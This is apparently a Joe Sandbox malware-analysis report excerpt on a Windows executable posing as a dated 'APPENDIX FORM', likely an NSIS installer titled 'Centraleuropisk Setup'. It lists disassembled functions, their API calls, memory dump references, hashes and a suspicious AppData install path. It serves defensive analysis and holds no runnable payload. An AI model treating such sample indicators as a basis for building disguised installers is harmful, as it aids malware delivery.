                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 7aba50aa0948cfab866059e52f9a9c5e44c976da6b68f312ffb00050615e0fe3
                                                                                                              • Instruction ID: 1c28d6597be202d9198edad89b2e8d2d8fa224b429d87ce3c72ca6b02034bc90
                                                                                                              • Opcode Fuzzy Hash: 7aba50aa0948cfab866059e52f9a9c5e44c976da6b68f312ffb00050615e0fe3
                                                                                                              • Instruction Fuzzy Hash: 99D0C9B7B14140ABDB50EBB8AE8945A73E8EB5132A7248833D902E1092E17DC942CA19
                                                                                                              Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,?), ref: 1000121D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761449716-0
                                                                                                              • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                              • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                                                              • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                              • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                                                                                              Non-executed Functions

                                                                                                              Function 00404948 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404960
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 0040496B
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B5
                                                                                                              • LoadBitmapA.USER32(0000006E), ref: 004049C8
                                                                                                              • SetWindowLongA.USER32(?,000000FC,00404F3F), ref: 004049E1
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F5
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A07
                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1D
                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A29
                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A3B
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404A3E
                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A69
                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A75
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B0A
                                                                                                              • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B35
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B49
                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404B78
                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B86
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404B97
                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C94
                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF9
                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0E
                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D32
                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D52
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D67
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404D77
                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DF0
                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404E99
                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA8
                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00404EC8
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F16
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F21
                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F28
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: e14102fe6961f3bd879f75b66abcc8dccaff5f140c0d049c167274bc5358bb3e
                                                                                                              • Instruction ID: f2143584ce3f00a3ae0df77e4ff30717a481f0723155f1d06c12757e5ebf3bcb
                                                                                                              • Opcode Fuzzy Hash: e14102fe6961f3bd879f75b66abcc8dccaff5f140c0d049c167274bc5358bb3e
                                                                                                              • Instruction Fuzzy Hash: E9026FB0900209AFEB10DF54DD85AAE7BB5FB84315F10817AF610BA2E1D7789E42DF58
                                                                                                              Function 00405109 Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405169
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405178
                                                                                                              • GetClientRect.USER32(?,?), ref: 004051B5
                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051BD
                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DE
                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051EF
                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405202
                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405210
                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405223
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405245
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405259
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040527A
                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040528A
                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A3
                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AF
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405187
                                                                                                                • Part of subcall function 00404003: SendMessageA.USER32(00000028,?,?,00403E34), ref: 00404011
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052CB
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000509D,00000000), ref: 004052D9
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004052E0
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405303
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040530A
                                                                                                              • ShowWindow.USER32(00000008), ref: 00405350
                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405384
                                                                                                              • CreatePopupMenu.USER32 ref: 00405395
                                                                                                              • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004053AA
                                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 004053CA
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E3
                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541F
                                                                                                              • OpenClipboard.USER32(00000000), ref: 0040542F
                                                                                                              • EmptyClipboard.USER32 ref: 00405435
                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 0040543E
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405448
                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545C
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405475
                                                                                                              • SetClipboardData.USER32(?,00000000), ref: 00405480
                                                                                                              • CloseClipboard.USER32 ref: 00405486
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 590372296-0
                                                                                                              • Opcode ID: 231f48aea31901215ad5789a1abc6fe8876b192cf8bd0b4f923181e6492b2055
                                                                                                              • Instruction ID: 6e0b0f1ca08e2e29469adbd3a377171c3ef53385c96749dd380b411ab2712325
                                                                                                              • Opcode Fuzzy Hash: 231f48aea31901215ad5789a1abc6fe8876b192cf8bd0b4f923181e6492b2055
                                                                                                              • Instruction Fuzzy Hash: CBA16971900209BFDB21AFA0DD89AAE7F79FB04345F00407AFA05B61A0C7B55E41DF69
                                                                                                              Function 0040440C Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 268stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040445B
                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404485
                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404536
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404541
                                                                                                              • lstrcmpiA.KERNEL32(Call,0041FCE0), ref: 00404573
                                                                                                              • lstrcatA.KERNEL32(?,Call), ref: 0040457F
                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404591
                                                                                                                • Part of subcall function 004054D8: GetDlgItemTextA.USER32(?,?,00000400,004045C8), ref: 004054EB
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FA3
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FB5
                                                                                                                • Part of subcall function 00405F4B: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FC5
                                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464C
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404667
                                                                                                              • SetDlgItemTextA.USER32(00000000,00000400,0041ECA0), ref: 004046ED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                              • String ID: A$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry$Call
                                                                                                              • API String ID: 2246997448-359601769
                                                                                                              • Opcode ID: f9db517728459d62a9e5b220071132723c113a2d480dcc074d32842f0db3b1f1
                                                                                                              • Instruction ID: 313b0aeaa0dd49dd5f389a011650d1956071e47b5f1a5152bec8bcd399de40b9
                                                                                                              • Opcode Fuzzy Hash: f9db517728459d62a9e5b220071132723c113a2d480dcc074d32842f0db3b1f1
                                                                                                              • Instruction Fuzzy Hash: 049193B1900209ABDB10AFA1CD45BAF77B8EF85305F10847BFA01B72C1D77C9A418B69
                                                                                                              Function 00403AFB Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B37
                                                                                                              • ShowWindow.USER32(?), ref: 00403B54
                                                                                                              • DestroyWindow.USER32 ref: 00403B68
                                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B84
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403BA5
                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB9
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403BC0
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403C6E
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403C78
                                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403C92
                                                                                                              • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403CE3
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403D89
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403DAA
                                                                                                              • EnableWindow.USER32(?,?), ref: 00403DBC
                                                                                                              • EnableWindow.USER32(?,?), ref: 00403DD7
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403DED
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403DF4
                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E0C
                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1F
                                                                                                              • lstrlenA.KERNEL32(0041FCE0,?,0041FCE0,Centraleuropisk Setup), ref: 00403E48
                                                                                                              • SetWindowTextA.USER32(?,0041FCE0), ref: 00403E57
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403F8B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                              • String ID: Centraleuropisk Setup
                                                                                                              • API String ID: 184305955-4217614216
                                                                                                              • Opcode ID: ba0bfc16478daa2257c26ccfe252ff3d546126a5ed30cf874ebc8b0736617fa5
                                                                                                              • Instruction ID: 21636550a0957eda034e59b3f0d86482ba9c2b0b2001697664a7690c7cb4d951
                                                                                                              • Opcode Fuzzy Hash: ba0bfc16478daa2257c26ccfe252ff3d546126a5ed30cf874ebc8b0736617fa5
                                                                                                              • Instruction Fuzzy Hash: D4C19171A08205BBDB216F61ED49E2B3E7DFB4470AB40443EF601B12E1C7799942EB5E
                                                                                                              Function 00404117 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004041A2
                                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 004041B6
                                                                                                              • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004041D4
                                                                                                              • GetSysColor.USER32(?), ref: 004041E5
                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F4
                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404203
                                                                                                              • lstrlenA.KERNEL32(?), ref: 00404206
                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404215
                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040422A
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040428C
                                                                                                              • SendMessageA.USER32(00000000), ref: 0040428F
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042BA
                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042FA
                                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00404309
                                                                                                              • SetCursor.USER32(00000000), ref: 00404312
                                                                                                              • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,?), ref: 00404325
                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00404332
                                                                                                              • SetCursor.USER32(00000000), ref: 00404335
                                                                                                              • SendMessageA.USER32(00000111,?,00000000), ref: 00404361
                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404375
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                              • String ID: Call$N$open$@@
                                                                                                              • API String ID: 3615053054-3329210235
                                                                                                              • Opcode ID: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
                                                                                                              • Instruction ID: 48be33ef10acdba92a50f670ec3bcd7ef70e1bb9311df19d6f40dceb05da6325
                                                                                                              • Opcode Fuzzy Hash: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
                                                                                                              • Instruction Fuzzy Hash: 306183B1A40205BFEB109F61CC45F6A7B69EB84715F10803AFF05BA2D1C7B8A951CF99
                                                                                                              Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextA.USER32(00000000,Centraleuropisk Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: Centraleuropisk Setup$F
                                                                                                              • API String ID: 941294808-2596094117
                                                                                                              • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                              • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                                                                              • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
